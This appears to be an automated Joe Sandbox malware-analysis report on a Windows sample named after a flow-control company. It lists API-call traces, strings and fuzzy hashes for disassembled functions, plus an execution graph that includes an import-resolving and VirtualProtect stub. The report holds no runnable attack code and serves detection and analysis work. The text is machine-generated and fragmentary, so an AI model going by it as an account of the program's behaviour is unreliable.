                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 2789212964-323797159
                                                                                                    • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                    • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf
                                                                                                    • String ID: %%-%d.%ds
                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                    • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                    • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                    APIs
                                                                                                    • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                    • memset.MSVCRT ref: 00401917
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PlacementWindowmemset
                                                                                                    • String ID: WinPos
                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                    • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                    • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                    • String ID: _lng.ini
                                                                                                    • API String ID: 383090722-1948609170
                                                                                                    • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                    • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                    • API String ID: 2773794195-880857682
                                                                                                    • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                    • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                    • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow
                                                                                                    • String ID: MZ@
                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                    • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                    • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                    • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                    • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
                                                                                                    • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                    • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 726966127-0
                                                                                                    • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                    • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040B224
                                                                                                    • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 726966127-0
                                                                                                    • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                    • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 231171946-0
                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3669619086-0
                                                                                                    • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                    • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2605342592-0
                                                                                                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1961120804-0
                                                                                                    • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                    • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.4%
                                                                                                    Dynamic/Decrypted Code Coverage:19.8%
                                                                                                    Signature Coverage:0.5%
                                                                                                    Total number of Nodes:868
                                                                                                    Total number of Limit Nodes:21
                                                                                                    execution_graph 34112 40fc40 70 API calls 34286 403640 21 API calls 34113 427fa4 42 API calls 34287 412e43 _endthreadex 34288 425115 76 API calls __fprintf_l 34289 43fe40 133 API calls 34116 425115 83 API calls __fprintf_l 34117 401445 memcpy memcpy DialogBoxParamA 34118 440c40 34 API calls 34120 411853 RtlInitializeCriticalSection memset 34121 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34295 40a256 13 API calls 34297 432e5b 17 API calls 34299 43fa5a 20 API calls 34123 401060 41 API calls 34302 427260 CloseHandle memset memset 33181 410c68 FindResourceA 33182 410c81 SizeofResource 33181->33182 33184 410cae 33181->33184 33183 410c92 LoadResource 33182->33183 33182->33184 33183->33184 33185 410ca0 LockResource 33183->33185 33185->33184 34304 405e69 14 API calls 34128 433068 15 API calls __fprintf_l 34306 414a6d 18 API calls 34307 43fe6f 134 API calls 34130 424c6d 15 API calls __fprintf_l 34308 426741 19 API calls 34132 440c70 17 API calls 34133 443c71 44 API calls 34136 427c79 24 API calls 34311 416e7e memset __fprintf_l 34140 42800b 47 API calls 34141 425115 85 API calls __fprintf_l 34314 41960c 61 API calls 34142 43f40c 122 API calls __fprintf_l 34145 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34146 43f81a 20 API calls 34148 414c20 memset memset 34149 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34318 414625 18 API calls 34319 404225 modf 34320 403a26 strlen WriteFile 34322 40422a 12 API calls 34326 427632 memset memset memcpy 34327 40ca30 59 API calls 34328 404235 26 API calls 34150 42ec34 61 API calls __fprintf_l 34151 425115 76 API calls __fprintf_l 34329 425115 77 API calls __fprintf_l 34331 44223a 38 API calls 34157 43183c 112 API calls 34332 44b2c5 _onexit __dllonexit 34337 42a6d2 memcpy __allrem 34159 405cda 65 API calls 34345 43fedc 138 API calls 34346 4116e1 16 API calls __fprintf_l 34162 4244e6 19 API calls 34164 42e8e8 127 API calls __fprintf_l 34165 4118ee RtlLeaveCriticalSection 34351 43f6ec 22 API calls 34167 425115 119 API calls __fprintf_l 33171 410cf3 EnumResourceNamesA 34354 4492f0 memcpy memcpy 34356 43fafa 18 API calls 34358 4342f9 15 API calls __fprintf_l 34168 4144fd 19 API calls 34360 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34361 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34364 443a84 _mbscpy 34366 43f681 17 API calls 34171 404487 22 API calls 34368 415e8c 16 API calls __fprintf_l 34175 411893 RtlDeleteCriticalSection __fprintf_l 34176 41a492 42 API calls 34372 403e96 34 API calls 34373 410e98 memset SHGetPathFromIDList SendMessageA 34178 426741 109 API calls __fprintf_l 34179 4344a2 18 API calls 34180 4094a2 10 API calls 34182 4108a4 7 API calls 34376 4116a6 15 API calls __fprintf_l 34377 43f6a4 17 API calls 34378 440aa3 20 API calls 34380 427430 45 API calls 34184 4090b0 7 API calls 34185 4148b0 15 API calls 34187 4118b4 RtlEnterCriticalSection 34188 4014b7 CreateWindowExA 34189 40c8b8 19 API calls 34191 4118bf RtlTryEnterCriticalSection 34385 42434a 18 API calls __fprintf_l 34387 405f53 12 API calls 34199 43f956 59 API calls 34201 40955a 17 API calls 34202 428561 36 API calls 34203 409164 7 API calls 34391 404366 19 API calls 34395 40176c ExitProcess 34398 410777 42 API calls 34208 40dd7b 51 API calls 34209 425d7c 16 API calls __fprintf_l 34400 43f6f0 25 API calls 34401 42db01 22 API calls 34210 412905 15 API calls __fprintf_l 34402 403b04 54 API calls 34403 405f04 SetDlgItemTextA GetDlgItemTextA 34404 44b301 ??3@YAXPAX 34407 4120ea 14 API calls 3 library calls 34408 40bb0a 8 API calls 34410 413f11 strcmp 34214 434110 17 API calls __fprintf_l 34217 425115 108 API calls __fprintf_l 34411 444b11 _onexit 34219 425115 76 API calls __fprintf_l 34222 429d19 10 API calls 34414 444b1f __dllonexit 34415 409f20 _strcmpi 34224 42b927 31 API calls 34418 433f26 19 API calls __fprintf_l 34419 44b323 FreeLibrary 34420 427f25 46 API calls 34421 43ff2b 17 API calls 34422 43fb30 19 API calls 34231 414d36 16 API calls 34233 40ad38 7 API calls 34424 433b38 16 API calls __fprintf_l 34103 44b33b 34104 44b344 ??3@YAXPAX 34103->34104 34105 44b34b 34103->34105 34104->34105 34106 44b354 ??3@YAXPAX 34105->34106 34107 44b35b 34105->34107 34106->34107 34108 44b364 ??3@YAXPAX 34107->34108 34109 44b36b 34107->34109 34108->34109 34110 44b374 ??3@YAXPAX 34109->34110 34111 44b37b 34109->34111 34110->34111 34237 426741 21 API calls 34238 40c5c3 125 API calls 34240 43fdc5 17 API calls 34425 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34243 4161cb memcpy memcpy memcpy memcpy 33186 44b3cf 33187 44b3e6 33186->33187 33192 44b454 33186->33192 33187->33192 33199 44b40e GetModuleHandleA 33187->33199 33189 44b45d GetModuleHandleA 33193 44b467 33189->33193 33190 44b49a 33212 44b49f 33190->33212 33192->33189 33192->33190 33192->33193 33193->33192 33194 44b487 GetProcAddress 33193->33194 33194->33192 33195 44b405 33195->33192 33195->33193 33196 44b428 GetProcAddress 33195->33196 33196->33192 33197 44b435 VirtualProtect 33196->33197 33197->33192 33198 44b444 VirtualProtect 33197->33198 